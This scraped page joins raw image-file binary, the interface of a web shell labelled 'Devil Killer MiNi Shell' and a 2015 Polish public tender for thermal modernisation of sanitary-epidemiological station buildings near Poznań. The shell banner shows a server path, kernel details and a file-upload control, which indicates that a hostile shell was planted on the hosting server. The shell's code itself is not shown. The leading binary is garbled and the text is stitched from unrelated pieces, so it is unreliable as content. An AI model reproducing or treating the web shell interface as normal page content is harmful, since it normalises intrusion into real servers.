JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150227/27201-N-2015.html

<p class="kh_header"><b>Poznań: TERMOMODERNIZACJA BUDYNKÓW POWIATOWYCH STACJI SANITARNO-EPIDEMIOLOGICZNYCH</b><br>
<b>Numer ogłoszenia: 27201 - 2015; data zamieszczenia: 27.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzka Stacja Sanitarno-Epidemiologiczna w Poznaniu , ul. Zygmunta Noskowskiego 23, 61-705 Poznań, woj. wielkopolskie, tel. 61 85 44 890, faks 61 85 44 834.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.wsse-poznan.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> TERMOMODERNIZACJA BUDYNKÓW POWIATOWYCH STACJI SANITARNO-EPIDEMIOLOGICZNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na termomodernizacji Powiatowych Stacji Sanitarno-Epidemiologicznych, z podziałem na 3 części:

Część nr 1: Termomodernizacja budynku PSSE w Pleszewie: ocieplenie ścian budynku, ocieplenie stropodachu, wymiana stolarki-bramy, drzwi 
W przedmiotowym obiekcie wykorzystuje się całkowicie istniejącą konstrukcję budynku. Funkcja wewnętrzna nie ulega zmianie i nie powoduje zmian obciążeń przypadających na konstrukcje oraz zmian schematów statycznych występujących w przedmiotowym budynku.
Prace prowadzone będą jedynie przy elewacji zewnętrznej i dachu budynku.
Ponieważ obiekt nie spełnia wymogów ochrony cieplnej budynków projektuje się przedsięwzięcie termomodernizacyjne polegające na:
wymianie starych drzwi metalowych zewnętrznych na nowe o współczynniku U=1.7 W/m2K;
wymianie starych drewnianych bram garażowych na nowe o współczynniku U=1.7 W/m2K;
ocieplenie stropodachu styropianem o grubości 12 cm laminowanych papą      o współczynniku przewodności =0.040 W/m2K warstwą papy termozgrzewalnej;
ocieplenie ścian zewnętrznych budynku budynku styropianem o grubości 15 cm;
ocieplenie ścian zewnętrznych przyziemia (cokołu) do wysokości 85 cm styropianem.

Część nr 2: Termomodernizacja budynku Powiatowej Stacji Sanitarno-Epidemiologicznej w Słupcy
Przedmiotem opracowania jest docieplenie ścian zewnętrznych budynku PSSE w Słupcy oraz wymiana stolarki okiennej i drzwiowej, ocieplenie stropodachu oraz wymiana pieca co.o.
Zakres prac obejmuje:
docieplenie ścian podłużnych;
docieplenie ściany podokiennej;
docieplenie marka międzyokiennego;
demontaż starego kotła gazowego oraz pompy podmieszania;
montaż nowego pieca gazowego kondensacyjnego z pompą obiegu kotła          i całkowitym osprzętem;
roboty towarzyszące.
Uwaga! Budynek znajduje się pod ochroną Konserwatora Zabytków, dlatego istotne jest odtworzenie wszystkich elementów ozdobnych w postaci gzymsów, ryzalitów i podokienników.	

Część nr 3: Termomodernizacja budynku Powiatowej Stacji Sanitarno-Epidemiologicznej w Turku
Celem opracowania jest poprawienie parametrów cieplno-wilgotnościowych ścian zewnętrznych i stropodachu budynku przez docieplenie metodą lekką-mokrą, docieplenie stropodachu materiałem termoizolacyjnym, oraz modernizację instalacji centralnego ogrzewania uwzględniając obowiązujące normy i przepisy budowlane.
	Zakres projektowanej termomodernizacji:
	Termomodernizacja ścian zewnętrznych w technologii lekkiej mokrej
styropian grubości 12 cm EPS 70 = 0,038
docieplenie ościeży styropianem grubości 2 cm EPS 70 = 0,038
	Tynki cienkowarstwowe akrylowe dekoracyjne systemowe
	Termomodernizacja stropodachu wentylowanego:
wełna mineralna GRANULAT grubości 23 cm o współczynniku = 0,06 W/(m2K) .
	Modernizację instalacji c.o. polegającej na   wymianie grzejników, izolacji termicznej rur w pomieszczeniach nieogrzewanych, wymianie rur i gałązek w przypadku zmiany lokalizacji grzejników, odcinków rur skorodowanych i zamontowaniu zaworów termostatycznych.
	Roboty towarzyszące i różne związane z projektowaną termomodernizacją budynku  	tynki dekoracyjne daszków, gzymsów,
pokrycie dachu papą termozgrzewalną gr. 5,2 mm w kolorze zielonym z posypką mineralną, wymiana rynien, rur spustowych i obróbek blacharskich, wymianę opaski budynku z kostki brukowej przy robotach termomodernizacyjnych, montaż kratek wentylacyjnych, krat okiennych piwnicznych, malowanie elementów metalowych.

Szczegółowe wymagania techniczne oraz zakresy rzeczowe robót, dotyczące wszystkich części, opisane zostały w:
projektach wykonawczych przewidywanych robót;
Specyfikacjach Technicznych Wykonania i Odbioru Robót,
przedmiarach robót.

Dla urządzeń, dla których projektant wskazał producenta, Zamawiający dopuszcza rozwiązania równoważne, z zastrzeżeniem jednak, że nie będą one gorsze technicznie od urządzeń wskazanych w projekcie.
Wykonawca, który zaoferuje rozwiązania równoważne, jest zobowiązany dołączyć do oferty charakterystykę techniczną jednostek wskazanych w projekcie i charakterystykę jednostek oferowanych. Mogą to być specyfikacje urządzeń, ulotki lub inne materiały z podkreślonymi kolorem cechami charakterystycznymi, a jednocześnie potwierdzającymi zgodność równoważnego produktu z produktami wskazanymi w projekcie.
Ocena równoważności oferowanych urządzeń opierać się będzie na porównaniu danych technicznych urządzeń. Urządzenia równoważne nie mogą powodować zmiany projektu wykonawczego. Ponadto do rozwiązań równoważnych należy dołączyć deklarację zgodności CE na dane urządzenie.

Roboty prowadzone będą w obiektach czynnych, a więc realizacja powinna uwzględniać ich przebieg również po godzinie 15:00 i w dni wolne od pracy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 44.22.10.00-5, 45.00.00.00-7, 45.32.10.00-3, 45.26.14.10-1, 45.31.10.00-6, 45.33.11.00-7, 45.33.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium w wysokości:
	Część nr 1: 4.000,00 zł (słownie: cztery tysiące 00/100 zł)
	Część nr 2: 6.000,00 zł (słownie: sześć tysięcy 00/100 zł)
	Część nr 3: 5.500,00 zł (słownie: pięć tysięcy pięćset 00/100 zł)
2. Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu - PRZELEWEM,
b) poręczeniach bankowych,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
Wadium zostaje wniesione na okres związania ofertą, tj. przez 30 dni od dnia,
w którym upływa termin składania ofert.
Wadium w formie pieniężnej należy wnieść PRZELEWEM na rachunek bankowy Zamawiającego nr: 34 1010 1469 0006 4813 9120 0000.
Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w kasie Zamawiającego.
Nie należy załączać oryginału dokumentu wadialnego do oferty.
Kserokopię dowodu wniesienia wadium w formie pieniądza, należy dołączyć do oferty.
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia         i nazwiska). 
Z treści gwarancji winno wynikać bezwarunkowe, że na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert.
Wniesienie wadium w pieniądzu - PRZELEWEM będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
Wykonawca, który nie wniesie wadium w sposób określony w SIWZ zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo zamówień publicznych, jeśli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez zamawiającego.
Wadium wniesione w pieniądzu, zamawiający zwróci wraz z odsetkami wynikającymi       z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone          o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelewy pieniędzy na rachunek bankowy wskazany przez wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz              z odsetkami w przypadku, gdy Wykonawca:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniesie zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe
z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przedmiotowego warunku zostanie dokonana w oparciu
o przedłożone przez Wykonawcę oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przedmiotowego warunku zostanie dokonana w oparciu
o przedłożone przez Wykonawcę oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o dokumenty potwierdzające, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
- wykonanie co najmniej dwóch robót budowlanych polegających na termomodernizacji budynku o wartości nie mniejszej niż 150.000,00 zł brutto każda;
- wykonanie co najmniej jednej modernizacji instalacji centralnego ogrzewania (c.o.) i ciepłej wody użytkowej o wartości nie mniejszej niż 30.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przedmiotowego warunku zostanie dokonana w oparciu
o przedłożone przez Wykonawcę oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o wykaz osób - kierownika budowy/kierowników robót z informacją na temat Ich kwalifikacji.
UWAGA! W przypadku kiedy oferta składana jest na więcej niż jedną część warunek zostanie uznany za spełniony jeśli wykazana zostanie jedna osoba do każdej z części zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przedmiotowego warunku zostanie dokonana w oparciu
o przedłożone przez Wykonawcę oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o wykaz osób - kierownika budowy/kierowników robót z informacją na temat Ich kwalifikacji.
UWAGA! W przypadku kiedy oferta składana jest na więcej niż jedną część warunek zostanie uznany za spełniony jeśli wykazana zostanie jedna osoba do każdej z części zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przedmiotowego warunku zostanie dokonana w oparciu
o przedłożone przez Wykonawcę oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o w oparciu o dokumenty potwierdzające posiadanie ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 150.000,00 zł.
UWAGA! W przypadku kiedy oferta składana jest na więcej niż jedną część warunek zostanie uznany za spełniony jeśli wysokość ubezpieczenia będzie wynosiła krotność 150.000,00 zł za każdą część zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">3. W celu potwierdzenia, że oferowane dostawy wchodzące w zakres robót budowlanych objętych niniejszym postępowaniem odpowiadają wymaganiom określonym przez Zamawiającego do oferty należy dołączyć:
a) opisy zaoferowanych urządzeń równoważnych jednoznacznie wskazujące na zgodność z urządzeniami zaproponowanymi przez Zamawiającego - mogą to być specyfikacje urządzeń, ulotki lub inne materiały z podkreślonymi kolorem cechami charakterystycznymi, a jednocześnie potwierdzającymi zgodność równoważnego produktu z produktami wskazanymi w projekcie;
b) deklaracje CE.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
